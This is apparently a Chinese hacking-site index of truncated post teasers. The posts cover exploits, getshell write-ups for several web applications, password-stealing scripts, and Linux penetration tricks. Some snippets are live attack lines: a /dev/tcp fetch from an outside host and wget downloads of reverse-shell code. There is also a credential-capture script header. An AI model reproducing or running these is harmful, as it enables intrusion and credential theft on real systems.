#!/usr/bin/python import re import sys,urllib2,urllib print "/n[*] Zabbix 2.0.1 Session Extractor 0d...
DZ论坛最新注入漏洞利用工具(获取uckey和帐号密码)
DZ论坛最新注入漏洞利用工具 (获取uckey和帐号密码) DZ论坛最新注入漏洞利用工具(获取uckey和帐号密码)解压码:www.moonsec.com.rar
提权后获取linux root密码
在webbackdoor本身是root (可能性小的可怜)或通过某漏洞 溢出成功得到最高权限后,如果能获取root密码能给我们带来很多的好处。查询了一下前辈的方法,一个是欺骗su记...
Windows+Apache+Python配置简略,2011完整无错版
哥们倒腾了四五年的PHP以后,面对日益严重的桌面软件需求,终于下定决心要开始Python的学习之路了。 去年学了C#的半本书,无奈其较高的学习门槛和跨平台缺陷,最终还是转向了Python,估且算是俺的...
Linux常用渗透小技巧
1.无wget nc等下载工具时下载文件 exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.p...
发个一句话附带连接方法
这个一句话是某个学员发给我的,我看了一下 网上好像没有连接的办法 稍微研究了一下结果连接方法就出来了
记录一个linux下小脚本(记录root密码)
#!/usr/bin/python import os, sys, getpass, time current_time = time.strftime("%Y-%m-%d %H:%M") logfi...
PHPCMS V9 一个为所欲为的漏洞
phpcms phpsso_auth_key泄露: WooYun: PHPCMS V9 一个为所欲为的漏洞 http://www.2cto.com/phpsso_ser...
建站之星Sitestar前台Getshell一枚
漏洞作者: ′ 雨。 简要描述: 看sitestar 在某数字公司还是属于一般应用的, 就准备提数字了。 太坑了 然后果断拒绝提交详情。 还是提到乌云来把。 不知道sitestar...
linux下反弹shell脚本 C版和Perl版 webshell反弹回命令行
在线下载 可以用 wget http://www.linux so.com/exp/shell.c wget http://www.linuxso.com/exp/shell.pl
【国内数千机构邮箱的沦陷】eYou邮箱系统系列产品若干个漏洞
eYou是目前国内机构(高校、政府、企业)使用率最高的邮箱系统之一。 今发现eYou邮件系统、eYou邮件网关系统有多处严重的安全隐患,攻击者可入侵服务器和盗取任意邮箱信息。 影响...
帝国备份王(Empirebak)万能cookie及拿shell
帝国备份王(Empirebak)万能cookie及拿shell 漏洞 作者: Flow 1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456...
1156